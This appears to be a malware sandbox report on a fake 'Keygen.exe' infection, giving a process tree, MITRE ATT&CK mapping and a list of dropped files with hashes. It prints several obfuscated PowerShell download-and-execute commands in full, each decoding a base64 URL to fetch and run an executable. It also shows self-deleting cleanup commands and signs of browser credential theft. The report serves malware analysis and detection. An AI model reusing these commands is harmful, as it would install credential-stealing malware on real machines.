                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                    4⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:992
                    • C:\Users\Public\izy.exe
                      "C:\Users\Public\izy.exe"
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2328
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                        6⤵
                        • Loads dropped DLL
                        PID:3060
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1840
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                            • Loads dropped DLL
                            PID:3048
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                              "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                              9⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of SetThreadContext
                              • Suspicious use of AdjustPrivilegeToken
                              PID:616
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                10⤵
                                • Executes dropped EXE
                                PID:1960
                          • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                            8⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:1032
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 1032 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\529663893838100\\* & exit
                              9⤵
                                PID:1828
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 1032
                                  10⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1508
                        • C:\Users\Public\izy.exe
                          "C:\Users\Public\izy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2104
                        • C:\Users\Public\izy.exe
                          "C:\Users\Public\izy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2112
                        • C:\Users\Public\izy.exe
                          "C:\Users\Public\izy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2124
                        • C:\Users\Public\izy.exe
                          "C:\Users\Public\izy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2136
                        • C:\Users\Public\izy.exe
                          "C:\Users\Public\izy.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:2184
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\b1.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:1084
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:396
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 2
                    3⤵
                    • Delays execution with timeout.exe
                    PID:568
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\ba.hta"
                    3⤵
                    • Modifies Internet Explorer settings
                    • Suspicious use of WriteProcessMemory
                    PID:360
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                      4⤵
                      • Blocklisted process makes network request
                      • Loads dropped DLL
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1488
                      • C:\Users\Public\ymf.exe
                        "C:\Users\Public\ymf.exe"
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious behavior: MapViewOfSection
                        • Suspicious use of SetWindowsHookEx
                        PID:2388
                        • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                          "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:2540
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            7⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Checks processor information in registry
                            PID:2776
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c taskkill /pid 2776 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\862867456317241\\* & exit
                              8⤵
                                PID:2856
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /pid 2776
                                  9⤵
                                  • Kills process with taskkill
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2716
                          • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                            6⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:2644
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:3008
                          • C:\Users\Public\ymf.exe
                            "C:\Users\Public\ymf.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:2704
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\46FF.tmp\ba1.hta"
                      3⤵
                      • Modifies Internet Explorer settings
                      • Suspicious use of WriteProcessMemory
                      PID:1572
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1568

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Persistence

                Modify Existing Service

                1
                T1031

                Registry Run Keys / Startup Folder

                1
                T1060

                Defense Evasion

                Modify Registry

                6
                T1112

                Disabling Security Tools

                2
                T1089

                Install Root Certificate

                1
                T1130

                Credential Access

                Credentials in Files

                3
                T1081

                Discovery

                Query Registry

                2
                T1012

                System Information Discovery

                2
                T1082

                Collection

                Data from Local System

                3
                T1005

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\freebl3.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\mozglue.dll
                • C:\ProgramData\msvcp140.dll
                • C:\ProgramData\msvcp140.dll
                • C:\ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\softokn3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\sqlite3.dll
                • C:\ProgramData\vcruntime140.dll
                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_14f44f3b-2aff-4572-96cb-9500cb7f7deb
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_235184f8-dcca-4459-ace7-181c154dff79
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_30b237ae-3eea-4b33-87ad-b061953d3344
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_abbe7f8f-926c-4ad8-8c4f-6858a31beee7
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_de4eedb8-4762-4c56-b80c-203df3aa6fa8
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f15c7093-f51a-42c7-be56-49b50a1c9d48
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
                • C:\Users\Admin\AppData\Local\Temp\2LPeiXBkXh.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • C:\Users\Admin\AppData\Local\Temp\2LPeiXBkXh.exe
                  MD5

                  b621fed19f645ca8bac907d5fd650776

                  SHA1

                  db080c014d88b435de038c1284d42d0f942b6b0c

                  SHA256

                  fd8a2d8a0b371de5c76e01dccf208d7bd2593d962d3d961e7a0910e45d5cadac

                  SHA512

                  27b4dd73a3ffae17be9467280bfc6b5392d11f29e65f79e787c33360ab72943af89a3ebcacbdcb841c996191ffad4a58aee6e408c21d1060bf15c39dc23e08a3

                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\Keygen.exe
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\b.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\b1.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\ba.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\ba1.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\m.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\m1.hta
                • C:\Users\Admin\AppData\Local\Temp\46FF.tmp\start.bat
                • C:\Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe
                • C:\Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe
                • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • C:\Users\Admin\AppData\Local\Temp\Lrq5FNKzOI.exe
                • C:\Users\Admin\AppData\Local\Temp\Lrq5FNKzOI.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                • C:\Users\Admin\AppData\Local\Temp\SfgUR5zXYd.exe
                • C:\Users\Admin\AppData\Local\Temp\SfgUR5zXYd.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
                • C:\Users\Public\Natso.bat
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\izy.exe
                • C:\Users\Public\ymf.exe
                • C:\Users\Public\ymf.exe
                • C:\Users\Public\ymf.exe
                • C:\Users\Public\zwg.exe
                • C:\Users\Public\zwg.exe
                • C:\Users\Public\zwg.exe
                • C:\Windows\temp\eir3105t.inf
                • \??\PIPE\lsarpc
                • \??\PIPE\srvsvc
                • \??\PIPE\srvsvc
                • \ProgramData\mozglue.dll
                • \ProgramData\mozglue.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\msvcp140.dll
                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\nss3.dll
                  MD5

                  bfac4e3c5908856ba17d41edcd455a51

                  SHA1

                  8eec7e888767aa9e4cca8ff246eb2aacb9170428

                  SHA256

                  e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                  SHA512

                  2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                • \ProgramData\sqlite3.dll
                • \ProgramData\sqlite3.dll
                • \ProgramData\vcruntime140.dll
                • \ProgramData\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\msvcp140.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\vcruntime140.dll
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
                • \Users\Admin\AppData\Local\Temp\2LPeiXBkXh.exe
                  MD5

                  013db621a3351e3fb049efd2ccad79ff

                  SHA1

                  a23394ea54dbc5342a77938a2c285ee616185560

                  SHA256

                  df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                  SHA512

                  1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                • \Users\Admin\AppData\Local\Temp\46FF.tmp\Keygen.exe
                • \Users\Admin\AppData\Local\Temp\9l6CaXZdgU.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                • \Users\Admin\AppData\Local\Temp\Lrq5FNKzOI.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                • \Users\Admin\AppData\Local\Temp\SfgUR5zXYd.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\axcsdfa.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                • \Users\Public\izy.exe
                • \Users\Public\ymf.exe
                • \Users\Public\ymf.exe
                • \Users\Public\zwg.exe
                • \Users\Public\zwg.exe
                • memory/360-27-0x0000000000000000-mapping.dmp
                • memory/396-64-0x0000000006260000-0x0000000006261000-memory.dmp
                  Filesize

                  4KB

                • memory/396-126-0x0000000006590000-0x0000000006591000-memory.dmp
                  Filesize

                  4KB

